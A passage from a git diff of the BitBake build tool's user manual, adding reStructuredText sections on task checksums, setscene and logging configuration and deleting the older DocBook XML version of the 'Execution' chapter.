+scheduler. It is possible to configure the scheduler and define custom
+implementations for specific use cases. For more information, see these
+variables that control the behavior:
+
+-  :term:`BB_SCHEDULER`
+
+-  :term:`BB_SCHEDULERS`
+
+It is possible to have functions run before and after a task's main
+function. This is done using the ``[prefuncs]`` and ``[postfuncs]``
+flags of the task that lists the functions to run.
+
+.. _checksums:
+
+Checksums (Signatures)
+======================
+
+A checksum is a unique signature of a task's inputs. The signature of a
+task can be used to determine if a task needs to be run. Because it is a
+change in a task's inputs that triggers running the task, BitBake needs
+to detect all the inputs to a given task. For shell tasks, this turns
+out to be fairly easy because BitBake generates a "run" shell script for
+each task and it is possible to create a checksum that gives you a good
+idea of when the task's data changes.
+
+To complicate the problem, some things should not be included in the
+checksum. First, there is the actual specific build path of a given task
+- the working directory. It does not matter if the working directory
+changes because it should not affect the output for target packages. The
+simplistic approach for excluding the working directory is to set it to
+some fixed value and create the checksum for the "run" script. BitBake
+goes one step better and uses the
+:term:`BB_HASHBASE_WHITELIST` variable
+to define a list of variables that should never be included when
+generating the signatures.
+
+Another problem results from the "run" scripts containing functions that
+might or might not get called. The incremental build solution contains
+code that figures out dependencies between shell functions. This code is
+used to prune the "run" scripts down to the minimum set, thereby
+alleviating this problem and making the "run" scripts much more readable
+as a bonus.
+
+So far we have solutions for shell scripts. What about Python tasks? The
+same approach applies even though these tasks are more difficult. The
+process needs to figure out what variables a Python function accesses
+and what functions it calls. Again, the incremental build solution
+contains code that first figures out the variable and function
+dependencies, and then creates a checksum for the data used as the input
+to the task.
+
+Like the working directory case, situations exist where dependencies
+should be ignored. For these cases, you can instruct the build process
+to ignore a dependency by using a line like the following: ::
+
+  PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
+
+This example ensures that the
+``PACKAGE_ARCHS`` variable does not depend on the value of ``MACHINE``,
+even if it does reference it.
+
+Equally, there are cases where we need to add dependencies BitBake is
+not able to find. You can accomplish this by using a line like the
+following: ::
+
+  PACKAGE_ARCHS[vardeps] = "MACHINE"
+
+This example explicitly
+adds the ``MACHINE`` variable as a dependency for ``PACKAGE_ARCHS``.
+
+Consider a case with in-line Python, for example, where BitBake is not
+able to figure out dependencies. When running in debug mode (i.e. using
+``-DDD``), BitBake produces output when it discovers something for which
+it cannot figure out dependencies.
+
+Thus far, this section has limited discussion to the direct inputs into
+a task. Information based on direct inputs is referred to as the
+"basehash" in the code. However, there is still the question of a task's
+indirect inputs - the things that were already built and present in the
+build directory. The checksum (or signature) for a particular task needs
+to add the hashes of all the tasks on which the particular task depends.
+Choosing which dependencies to add is a policy decision. However, the
+effect is to generate a master checksum that combines the basehash and
+the hashes of the task's dependencies.
+
+At the code level, there are a variety of ways both the basehash and the
+dependent task hashes can be influenced. Within the BitBake
+configuration file, we can give BitBake some extra information to help
+it construct the basehash. The following statement effectively results
+in a list of global variable dependency excludes - variables never
+included in any checksum. This example uses variables from OpenEmbedded
+to help illustrate the concept: ::
+
+   BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
+       SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+       USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
+       PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
+       CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
+
+The previous example excludes the work directory, which is part of
+``TMPDIR``.
+
+The rules for deciding which hashes of dependent tasks to include
+through dependency chains are more complex and are generally
+accomplished with a Python function. The code in
+``meta/lib/oe/sstatesig.py`` shows two examples of this and also
+illustrates how you can insert your own policy into the system if so
+desired. This file defines the two basic signature generators
+OpenEmbedded-Core uses: "OEBasic" and "OEBasicHash". By default, there
+is a dummy "noop" signature handler enabled in BitBake. This means that
+behavior is unchanged from previous versions. ``OE-Core`` uses the
+"OEBasicHash" signature handler by default through this setting in the
+``bitbake.conf`` file: ::
+
+  BB_SIGNATURE_HANDLER ?= "OEBasicHash"
+
+The "OEBasicHash" ``BB_SIGNATURE_HANDLER`` is the same as the "OEBasic"
+version but adds the task hash to the stamp files. This results in any
+metadata change that changes the task hash, automatically causing the
+task to be run again. This removes the need to bump
+:term:`PR` values, and changes to metadata automatically
+ripple across the build.
+
+It is also worth noting that the end result of these signature
+generators is to make some dependency and hash information available to
+the build. This information includes:
+
+-  ``BB_BASEHASH_task-``\ *taskname*: The base hashes for each task in the
+   recipe.
+
+-  ``BB_BASEHASH_``\ *filename:taskname*: The base hashes for each
+   dependent task.
+
+-  ``BBHASHDEPS_``\ *filename:taskname*: The task dependencies for
+   each task.
+
+-  ``BB_TASKHASH``: The hash of the currently running task.
+
+It is worth noting that BitBake's "-S" option lets you debug BitBake's
+processing of signatures. The options passed to -S allow different
+debugging modes to be used, either using BitBake's own debug functions
+or possibly those defined in the metadata/signature handler itself. The
+simplest parameter to pass is "none", which causes a set of signature
+information to be written out into ``STAMPS_DIR`` corresponding to the
+targets specified. The other currently available parameter is
+"printdiff", which causes BitBake to try to establish the closest
+signature match it can (e.g. in the sstate cache) and then run
+``bitbake-diffsigs`` over the matches to determine the stamps and delta
+where these two stamp trees diverge.
+
+.. note::
+
+   It is likely that future versions of BitBake will provide other
+   signature handlers triggered through additional "-S" parameters.
+
+You can find more information on checksum metadata in the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:task checksums and setscene`
+section.
+
+Setscene
+========
+
+The setscene process enables BitBake to handle "pre-built" artifacts.
+The ability to handle and reuse these artifacts allows BitBake the
+luxury of not having to build something from scratch every time.
+Instead, BitBake can use, when possible, existing build artifacts.
+
+BitBake needs to have reliable data indicating whether or not an
+artifact is compatible. Signatures, described in the previous section,
+provide an ideal way of representing whether an artifact is compatible.
+If a signature is the same, an object can be reused.
+
+If an object can be reused, the problem then becomes how to replace a
+given task or set of tasks with the pre-built artifact. BitBake solves
+the problem with the "setscene" process.
+
+When BitBake is asked to build a given target, before building anything,
+it first asks whether cached information is available for any of the
+targets it's building, or any of the intermediate targets. If cached
+information is available, BitBake uses this information instead of
+running the main tasks.
+
+BitBake first calls the function defined by the
+:term:`BB_HASHCHECK_FUNCTION` variable
+with a list of tasks and corresponding hashes it wants to build. This
+function is designed to be fast and returns a list of the tasks for
+which it believes in can obtain artifacts.
+
+Next, for each of the tasks that were returned as possibilities, BitBake
+executes a setscene version of the task that the possible artifact
+covers. Setscene versions of a task have the string "_setscene" appended
+to the task name. So, for example, the task with the name ``xxx`` has a
+setscene task named ``xxx_setscene``. The setscene version of the task
+executes and provides the necessary artifacts returning either success
+or failure.
+
+As previously mentioned, an artifact can cover more than one task. For
+example, it is pointless to obtain a compiler if you already have the
+compiled binary. To handle this, BitBake calls the
+:term:`BB_SETSCENE_DEPVALID` function for
+each successful setscene task to know whether or not it needs to obtain
+the dependencies of that task.
+
+Finally, after all the setscene tasks have executed, BitBake calls the
+function listed in
+:term:`BB_SETSCENE_VERIFY_FUNCTION2`
+with the list of tasks BitBake thinks has been "covered". The metadata
+can then ensure that this list is correct and can inform BitBake that it
+wants specific tasks to be run regardless of the setscene result.
+
+You can find more information on setscene metadata in the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:task checksums and setscene`
+section.
+
+Logging
+=======
+
+In addition to the standard command line option to control how verbose
+builds are when execute, bitbake also supports user defined
+configuration of the `Python
+logging <https://docs.python.org/3/library/logging.html>`__ facilities
+through the :term:`BB_LOGCONFIG` variable. This
+variable defines a json or yaml `logging
+configuration <https://docs.python.org/3/library/logging.config.html>`__
+that will be intelligently merged into the default configuration. The
+logging configuration is merged using the following rules:
+
+-  The user defined configuration will completely replace the default
+   configuration if top level key ``bitbake_merge`` is set to the value
+   ``False``. In this case, all other rules are ignored.
+
+-  The user configuration must have a top level ``version`` which must
+   match the value of the default configuration.
+
+-  Any keys defined in the ``handlers``, ``formatters``, or ``filters``,
+   will be merged into the same section in the default configuration,
+   with the user specified keys taking replacing a default one if there
+   is a conflict. In practice, this means that if both the default
+   configuration and user configuration specify a handler named
+   ``myhandler``, the user defined one will replace the default. To
+   prevent the user from inadvertently replacing a default handler,
+   formatter, or filter, all of the default ones are named with a prefix
+   of "``BitBake.``"
+
+-  If a logger is defined by the user with the key ``bitbake_merge`` set
+   to ``False``, that logger will be completely replaced by user
+   configuration. In this case, no other rules will apply to that
+   logger.
+
+-  All user defined ``filter`` and ``handlers`` properties for a given
+   logger will be merged with corresponding properties from the default
+   logger. For example, if the user configuration adds a filter called
+   ``myFilter`` to the ``BitBake.SigGen``, and the default configuration
+   adds a filter called ``BitBake.defaultFilter``, both filters will be
+   applied to the logger
+
+As an example, consider the following user logging configuration file
+which logs all Hash Equivalence related messages of VERBOSE or higher to
+a file called ``hashequiv.log`` ::
+
+   {
+       "version": 1,
+       "handlers": {
+           "autobuilderlog": {
+               "class": "logging.FileHandler",
+               "formatter": "logfileFormatter",
+               "level": "DEBUG",
+               "filename": "hashequiv.log",
+               "mode": "w"
+           }
+       },
+       "formatters": {
+               "logfileFormatter": {
+                   "format": "%(name)s: %(levelname)s: %(message)s"
+               }
+       },
+       "loggers": {
+           "BitBake.SigGen.HashEquiv": {
+               "level": "VERBOSE",
+               "handlers": ["autobuilderlog"]
+           },
+           "BitBake.RunQueue.HashEquiv": {
+               "level": "VERBOSE",
+               "handlers": ["autobuilderlog"]
+           }
+       }
+   }
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml
deleted file mode 100644
index e4251dff56..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml
+++ /dev/null
@@ -1,1029 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-execution">
-    <title>Execution</title>
-
-    <para>
-        The primary purpose for running BitBake is to produce some kind
-        of output such as a single installable package, a kernel, a software
-        development kit, or even a full, board-specific bootable Linux image,
-        complete with bootloader, kernel, and root filesystem.
-        Of course, you can execute the <filename>bitbake</filename>
-        command with options that cause it to execute single tasks,
-        compile single recipe files, capture or clear data, or simply
-        return information about the execution environment.
-    </para>
-
-    <para>
-        This chapter describes BitBake's execution process from start
-        to finish when you use it to create an image.
-        The execution process is launched using the following command
-        form:
-        <literallayout class='monospaced'>
-     $ bitbake <replaceable>target</replaceable>
-        </literallayout>
-        For information on the BitBake command and its options,
-        see
-        "<link linkend='bitbake-user-manual-command'>The BitBake Command</link>"
-        section.
-        <note>
-            <para>
-                Prior to executing BitBake, you should take advantage of available
-                parallel thread execution on your build host by setting the
-                <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
-                variable in your project's <filename>local.conf</filename>
-                configuration file.
-            </para>
-
-            <para>
-                A common method to determine this value for your build host is to run
-                the following:
-                <literallayout class='monospaced'>
-     $ grep processor /proc/cpuinfo
-                </literallayout>
-                This command returns the number of processors, which takes into
-                account hyper-threading.
-                Thus, a quad-core build host with hyper-threading most likely
-                shows eight processors, which is the value you would then assign to
-                <filename>BB_NUMBER_THREADS</filename>.
-            </para>
-
-            <para>
-                A possibly simpler solution is that some Linux distributions
-                (e.g. Debian and Ubuntu) provide the <filename>ncpus</filename> command.
-            </para>
-        </note>
-    </para>
-
-    <section id='parsing-the-base-configuration-metadata'>
-        <title>Parsing the Base Configuration Metadata</title>
-
-        <para>
-            The first thing BitBake does is parse base configuration
-            metadata.
-            Base configuration metadata consists of your project's
-            <filename>bblayers.conf</filename> file to determine what
-            layers BitBake needs to recognize, all necessary
-            <filename>layer.conf</filename> files (one from each layer),
-            and <filename>bitbake.conf</filename>.
-            The data itself is of various types:
-            <itemizedlist>
-                <listitem><para><emphasis>Recipes:</emphasis>
-                    Details about particular pieces of software.
-                    </para></listitem>
-                <listitem><para><emphasis>Class Data:</emphasis>
-                    An abstraction of common build information
-                    (e.g. how to build a Linux kernel).
-                    </para></listitem>
-                <listitem><para><emphasis>Configuration Data:</emphasis>
-                    Machine-specific settings, policy decisions,
-                    and so forth.
-                    Configuration data acts as the glue to bind everything
-                    together.</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            The <filename>layer.conf</filename> files are used to
-            construct key variables such as
-            <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
-            and
-            <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>.
-            <filename>BBPATH</filename> is used to search for
-            configuration and class files under the
-            <filename>conf</filename> and <filename>classes</filename>
-            directories, respectively.
-            <filename>BBFILES</filename> is used to locate both recipe
-            and recipe append files
-            (<filename>.bb</filename> and <filename>.bbappend</filename>).
-            If there is no <filename>bblayers.conf</filename> file,
-            it is assumed the user has set the <filename>BBPATH</filename>
-            and <filename>BBFILES</filename> directly in the environment.
-        </para>
-
-        <para>
-            Next, the <filename>bitbake.conf</filename> file is located
-            using the <filename>BBPATH</filename> variable that was
-            just constructed.
-            The <filename>bitbake.conf</filename> file may also include other
-            configuration files using the
-            <filename>include</filename> or
-            <filename>require</filename> directives.
-        </para>
-
-        <para>
-            Prior to parsing configuration files, BitBake looks
-            at certain variables, including:
-            <itemizedlist>
-                <listitem><para>
-                    <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BB_ORIGENV'><filename>BB_ORIGENV</filename></link>
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-bb-BITBAKE_UI'><filename>BITBAKE_UI</filename></link>
-                    </para></listitem>
-            </itemizedlist>
-            The first four variables in this list relate to how BitBake treats shell
-            environment variables during task execution.
-            By default, BitBake cleans the environment variables and provides tight
-            control over the shell execution environment.
-            However, through the use of these first four variables, you can
-            apply your control regarding the
-            environment variables allowed to be used by BitBake in the shell
-            during execution of tasks.
-            See the
-            "<link linkend='passing-information-into-the-build-task-environment'>Passing Information Into the Build Task Environment</link>"
-            section and the information about these variables in the
-            variable glossary for more information on how they work and
-            on how to use them.
-        </para>
-
-        <para>
-            The base configuration metadata is global
-            and therefore affects all recipes and tasks that are executed.
-        </para>
-
-        <para>
-            BitBake first searches the current working directory for an
-            optional <filename>conf/bblayers.conf</filename> configuration file.
-            This file is expected to contain a
-            <link linkend='var-bb-BBLAYERS'><filename>BBLAYERS</filename></link>
-            variable that is a space-delimited list of 'layer' directories.
-            Recall that if BitBake cannot find a <filename>bblayers.conf</filename>
-            file, then it is assumed the user has set the <filename>BBPATH</filename>
-            and <filename>BBFILES</filename> variables directly in the environment.
-        </para>
-
-        <para>
-            For each directory (layer) in this list, a <filename>conf/layer.conf</filename>
-            file is located and parsed with the
-            <link linkend='var-bb-LAYERDIR'><filename>LAYERDIR</filename></link>
-            variable being set to the directory where the layer was found.
-            The idea is these files automatically set up
-            <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
-            and other variables correctly for a given build directory.
-        </para>
-
-        <para>
-            BitBake then expects to find the <filename>conf/bitbake.conf</filename>
-            file somewhere in the user-specified <filename>BBPATH</filename>.
-            That configuration file generally has include directives to pull
-            in any other metadata such as files specific to the architecture,
-            the machine, the local environment, and so forth.
-        </para>
-
-        <para>
-            Only variable definitions and include directives are allowed
-            in BitBake <filename>.conf</filename> files.
-            Some variables directly influence BitBake's behavior.
-            These variables might have been set from the environment
-            depending on the environment variables previously
-            mentioned or set in the configuration files.
-            The
-            "<link linkend='ref-bb-variables-glos'>Variables Glossary</link>"
-            chapter presents a full list of variables.
-        </para>
-
-        <para>
-            After parsing configuration files, BitBake uses its rudimentary
-            inheritance mechanism, which is through class files, to inherit
-            some standard classes.
-            BitBake parses a class when the inherit directive responsible
-            for getting that class is encountered.
-        </para>
-
-        <para>
-            The <filename>base.bbclass</filename> file is always included.
-            Other classes that are specified in the configuration using the
-            <link linkend='var-bb-INHERIT'><filename>INHERIT</filename></link>
-            variable are also included.
-            BitBake searches for class files in a
-            <filename>classes</filename> subdirectory under
-            the paths in <filename>BBPATH</filename> in the same way as
-            configuration files.
-        </para>
-
-        <para>
-            A good way to get an idea of the configuration files and
-            the class files used in your execution environment is to
-            run the following BitBake command:
-            <literallayout class='monospaced'>
-     $ bitbake -e > mybb.log
-            </literallayout>
-            Examining the top of the <filename>mybb.log</filename>
-            shows you the many configuration files and class files
-            used in your execution environment.
-        </para>
-
-        <note>
-            <para>
-                You need to be aware of how BitBake parses curly braces.
-                If a recipe uses a closing curly brace within the function and
-                the character has no leading spaces, BitBake produces a parsing
-                error.
-                If you use a pair of curly braces in a shell function, the
-                closing curly brace must not be located at the start of the line
-                without leading spaces.
-            </para>
-
-            <para>
-                Here is an example that causes BitBake to produce a parsing
-                error:
-                <literallayout class='monospaced'>
-     fakeroot create_shar() {
-         cat &lt;&lt; "EOF" &gt; ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
-     usage()
-     {
-       echo "test"
-       ###### The following "}" at the start of the line causes a parsing error ######
-     }
-     EOF
-     }
-                </literallayout>
-                Writing the recipe this way avoids the error:
-                <literallayout class='monospaced'>
-     fakeroot create_shar() {
-         cat &lt;&lt; "EOF" &gt; ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
-     usage()
-     {
-       echo "test"
-       ######The following "}" with a leading space at the start of the line avoids the error ######
-      }
-     EOF
-     }
-                </literallayout>
-            </para>
-        </note>
-    </section>
-
-    <section id='locating-and-parsing-recipes'>
-        <title>Locating and Parsing Recipes</title>
-
-        <para>
-            During the configuration phase, BitBake will have set
-            <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>.
-            BitBake now uses it to construct a list of recipes to parse,
-            along with any append files (<filename>.bbappend</filename>)
-            to apply.
-            <filename>BBFILES</filename> is a space-separated list of
-            available files and supports wildcards.
-            An example would be:
-            <literallayout class='monospaced'>
-     BBFILES = "/path/to/bbfiles/*.bb /path/to/appends/*.bbappend"
-            </literallayout>
-            BitBake parses each recipe and append file located
-            with <filename>BBFILES</filename> and stores the values of
-            various variables into the datastore.
-            <note>
-                Append files are applied in the order they are encountered in
-                <filename>BBFILES</filename>.
-            </note>
-            For each file, a fresh copy of the base configuration is
-            made, then the recipe is parsed line by line.
-            Any inherit statements cause BitBake to find and
-            then parse class files (<filename>.bbclass</filename>)
-            using
-            <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
-            as the search path.
-            Finally, BitBake parses in order any append files found in
-            <filename>BBFILES</filename>.
-        </para>
-
-        <para>
-            One common convention is to use the recipe filename to define
-            pieces of metadata.
-            For example, in <filename>bitbake.conf</filename> the recipe
-            name and version are used to set the variables
-            <link linkend='var-bb-PN'><filename>PN</filename></link> and
-            <link linkend='var-bb-PV'><filename>PV</filename></link>:
-            <literallayout class='monospaced'>
-     PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
-     PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
-            </literallayout>
-            In this example, a recipe called "something_1.2.3.bb" would set
-            <filename>PN</filename> to "something" and
-            <filename>PV</filename> to "1.2.3".
-        </para>
-
-        <para>
-            By the time parsing is complete for a recipe, BitBake
-            has a list of tasks that the recipe defines and a set of
-            data consisting of keys and values as well as
-            dependency information about the tasks.
-        </para>
-
-        <para>
-            BitBake does not need all of this information.
-            It only needs a small subset of the information to make
-            decisions about the recipe.
-            Consequently, BitBake caches the values in which it is
-            interested and does not store the rest of the information.
-            Experience has shown it is faster to re-parse the metadata than to
-            try and write it out to the disk and then reload it.
-        </para>
-
-        <para>
-            Where possible, subsequent BitBake commands reuse this cache of
-            recipe information.
-            The validity of this cache is determined by first computing a
-            checksum of the base configuration data (see
-            <link linkend='var-bb-BB_HASHCONFIG_WHITELIST'><filename>BB_HASHCONFIG_WHITELIST</filename></link>)
-            and then checking if the checksum matches.
-            If that checksum matches what is in the cache and the recipe
-            and class files have not changed, BitBake is able to use
-            the cache.
-            BitBake then reloads the cached information about the recipe
-            instead of reparsing it from scratch.
-        </para>
-
-        <para>
-            Recipe file collections exist to allow the user to
-            have multiple repositories of
-            <filename>.bb</filename> files that contain the same
-            exact package.
-            For example, one could easily use them to make one's
-            own local copy of an upstream repository, but with
-            custom modifications that one does not want upstream.
-            Here is an example:
-            <literallayout class='monospaced'>
-    BBFILES = "/stuff/openembedded/*/*.bb /stuff/openembedded.modified/*/*.bb"
-    BBFILE_COLLECTIONS = "upstream local"
-    BBFILE_PATTERN_upstream = "^/stuff/openembedded/"
-    BBFILE_PATTERN_local = "^/stuff/openembedded.modified/"
-    BBFILE_PRIORITY_upstream = "5"
-    BBFILE_PRIORITY_local = "10"
-            </literallayout>
-            <note>
-                The layers mechanism is now the preferred method of collecting
-                code.
-                While the collections code remains, its main use is to set layer
-                priorities and to deal with overlap (conflicts) between layers.
-            </note>
-        </para>
-    </section>
-
-    <section id='bb-bitbake-providers'>
-        <title>Providers</title>
-
-        <para>
-            Assuming BitBake has been instructed to execute a target
-            and that all the recipe files have been parsed, BitBake
-            starts to figure out how to build the target.
-            BitBake looks through the <filename>PROVIDES</filename> list
-            for each of the recipes.
-            A <filename>PROVIDES</filename> list is the list of names by which
-            the recipe can be known.
-            Each recipe's <filename>PROVIDES</filename> list is created
-            implicitly through the recipe's
-            <link linkend='var-bb-PN'><filename>PN</filename></link> variable
-            and explicitly through the recipe's
-            <link linkend='var-bb-PROVIDES'><filename>PROVIDES</filename></link>
-            variable, which is optional.
-        </para>
-
-        <para>
-            When a recipe uses <filename>PROVIDES</filename>, that recipe's
-            functionality can be found under an alternative name or names other
-            than the implicit <filename>PN</filename> name.
-            As an example, suppose a recipe named <filename>keyboard_1.0.bb</filename>
-            contained the following:
-            <literallayout class='monospaced'>
-     PROVIDES += "fullkeyboard"
-            </literallayout>
-            The <filename>PROVIDES</filename> list for this recipe becomes
-            "keyboard", which is implicit, and "fullkeyboard", which is explicit.
-            Consequently, the functionality found in
-            <filename>keyboard_1.0.bb</filename> can be found under two
-            different names.
-        </para>
-    </section>
-
-    <section id='bb-bitbake-preferences'>
-        <title>Preferences</title>
-
-        <para>
-            The <filename>PROVIDES</filename> list is only part of the solution
-            for figuring out a target's recipes.
-            Because targets might have multiple providers, BitBake needs
-            to prioritize providers by determining provider preferences.
-        </para>
-
-        <para>
-            A common example in which a target has multiple providers
-            is "virtual/kernel", which is on the
-            <filename>PROVIDES</filename> list for each kernel recipe.
-            Each machine often selects the best kernel provider by using a
-            line similar to the following in the machine configuration file:
-            <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel = "linux-yocto"
-            </literallayout>
-            The default
-            <link linkend='var-bb-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>
-            is the provider with the same name as the target.
-            BitBake iterates through each target it needs to build and
-            resolves them and their dependencies using this process.
-        </para>
-
-        <para>
-            Understanding how providers are chosen is made complicated by the fact
-            that multiple versions might exist for a given provider.
-            BitBake defaults to the highest version of a provider.
-            Version comparisons are made using the same method as Debian.
-            You can use the
-            <link linkend='var-bb-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
-            variable to specify a particular version.
-            You can influence the order by using the
-            <link linkend='var-bb-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
-            variable.
-        </para>
-
-        <para>
-            By default, files have a preference of "0".
-            Setting <filename>DEFAULT_PREFERENCE</filename> to "-1" makes the
-            recipe unlikely to be used unless it is explicitly referenced.
-            Setting <filename>DEFAULT_PREFERENCE</filename> to "1" makes it
-            likely the recipe is used.
-            <filename>PREFERRED_VERSION</filename> overrides any
-            <filename>DEFAULT_PREFERENCE</filename> setting.
-            <filename>DEFAULT_PREFERENCE</filename> is often used to mark newer
-            and more experimental recipe versions until they have undergone
-            sufficient testing to be considered stable.
-        </para>
-
-        <para>
-            When there are multiple “versions� of a given recipe,
-            BitBake defaults to selecting the most recent
-            version, unless otherwise specified.
-            If the recipe in question has a
-            <link linkend='var-bb-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
-            set lower than the other recipes (default is 0), then
-            it will not be selected.
-            This allows the person or persons maintaining
-            the repository of recipe files to specify
-            their preference for the default selected version.
-            Additionally, the user can specify their preferred version.
-        </para>
-
-        <para>
-            If the first recipe is named <filename>a_1.1.bb</filename>, then the
-            <link linkend='var-bb-PN'><filename>PN</filename></link> variable
-            will be set to “a�, and the
-            <link linkend='var-bb-PV'><filename>PV</filename></link>
-            variable will be set to 1.1.
-        </para>
-
-        <para>
-            Thus, if a recipe named <filename>a_1.2.bb</filename> exists, BitBake
-            will choose 1.2 by default.
-            However, if you define the following variable in a
-            <filename>.conf</filename> file that BitBake parses, you
-            can change that preference:
-            <literallayout class='monospaced'>
-     PREFERRED_VERSION_a = "1.1"
-            </literallayout>
-        </para>
-
-        <note>
-            <para>
-                It is common for a recipe to provide two versions -- a stable,
-                numbered (and preferred) version, and a version that is
-                automatically checked out from a source code repository that
-                is considered more "bleeding edge" but can be selected only
-                explicitly.
-            </para>
-
-            <para>
-                For example, in the OpenEmbedded codebase, there is a standard,
-                versioned recipe file for BusyBox,
-                <filename>busybox_1.22.1.bb</filename>,
-                but there is also a Git-based version,
-                <filename>busybox_git.bb</filename>, which explicitly contains the line
-                <literallayout class='monospaced'>
-    DEFAULT_PREFERENCE = "-1"
-                </literallayout>
-                to ensure that the numbered, stable version is always preferred
-                unless the developer selects otherwise.
-            </para>
-        </note>
-    </section>
-
-    <section id='bb-bitbake-dependencies'>
-        <title>Dependencies</title>
-
-        <para>
-            Each target BitBake builds consists of multiple tasks such as
-            <filename>fetch</filename>, <filename>unpack</filename>,
-            <filename>patch</filename>, <filename>configure</filename>,
-            and <filename>compile</filename>.
-            For best performance on multi-core systems, BitBake considers each
-            task as an independent
-            entity with its own set of dependencies.
-        </para>
-
-        <para>
-            Dependencies are defined through several variables.
-            You can find information about variables BitBake uses in
-            the <link linkend='ref-bb-variables-glos'>Variables Glossary</link>
-            near the end of this manual.
-            At a basic level, it is sufficient to know that BitBake uses the
-            <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link> and
-            <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link> variables when
-            calculating dependencies.
-        </para>
-
-        <para>
-            For more information on how BitBake handles dependencies, see the
-            "<link linkend='dependencies'>Dependencies</link>" section.
-        </para>
-    </section>
-
-    <section id='ref-bitbake-tasklist'>
-        <title>The Task List</title>
-
-        <para>
-            Based on the generated list of providers and the dependency information,
-            BitBake can now calculate exactly what tasks it needs to run and in what
-            order it needs to run them.
-            The
-            "<link linkend='executing-tasks'>Executing Tasks</link>" section has more
-            information on how BitBake chooses which task to execute next.
-        </para>
-
-        <para>
-            The build now starts with BitBake forking off threads up to the limit set in the
-            <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
-            variable.
-            BitBake continues to fork threads as long as there are tasks ready to run,
-            those tasks have all their dependencies met, and the thread threshold has not been
-            exceeded.
-        </para>
-
-        <para>
-            It is worth noting that you can greatly speed up the build time by properly setting
-            the <filename>BB_NUMBER_THREADS</filename> variable.
-        </para>
-
-        <para>
-            As each task completes, a timestamp is written to the directory specified by the
-            <link linkend='var-bb-STAMP'><filename>STAMP</filename></link> variable.
-            On subsequent runs, BitBake looks in the build directory within
-            <filename>tmp/stamps</filename> and does not rerun
-            tasks that are already completed unless a timestamp is found to be invalid.
-            Currently, invalid timestamps are only considered on a per
-            recipe file basis.
-            So, for example, if the configure stamp has a timestamp greater than the
-            compile timestamp for a given target, then the compile task would rerun.
-            Running the compile task again, however, has no effect on other providers
-            that depend on that target.
-        </para>
-
-        <para>
-            The exact format of the stamps is partly configurable.
-            In modern versions of BitBake, a hash is appended to the
-            stamp so that if the configuration changes, the stamp becomes
-            invalid and the task is automatically rerun.
-            This hash, or signature used, is governed by the signature policy
-            that is configured (see the
-            "<link linkend='checksums'>Checksums (Signatures)</link>"
-            section for information).
-            It is also possible to append extra metadata to the stamp using
-            the <filename>[stamp-extra-info]</filename> task flag.
-            For example, OpenEmbedded uses this flag to make some tasks machine-specific.
-        </para>
-
-        <note>
-            Some tasks are marked as "nostamp" tasks.
-            No timestamp file is created when these tasks are run.
-            Consequently, "nostamp" tasks are always rerun.
-        </note>
-
-        <para>
-            For more information on tasks, see the
-            "<link linkend='tasks'>Tasks</link>" section.
-        </para>
-    </section>
-
-    <section id='executing-tasks'>
-        <title>Executing Tasks</title>
-
-        <para>
-            Tasks can be either a shell task or a Python task.
-            For shell tasks, BitBake writes a shell script to
-            <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}/run.do_taskname.<replaceable>pid</replaceable></filename>
-            and then executes the script.
-            The generated shell script contains all the exported variables,
-            and the shell functions with all variables expanded.
-            Output from the shell script goes to the file
-            <filename>${T}/log.do_taskname.<replaceable>pid</replaceable></filename>.
-            Looking at the expanded shell functions in the run file and
-            the output in the log files is a useful debugging technique.
-        </para>
-
-        <para>
-            For Python tasks, BitBake executes the task internally and logs
-            information to the controlling terminal.
-            Future versions of BitBake will write the functions to files
-            similar to the way shell tasks are handled.
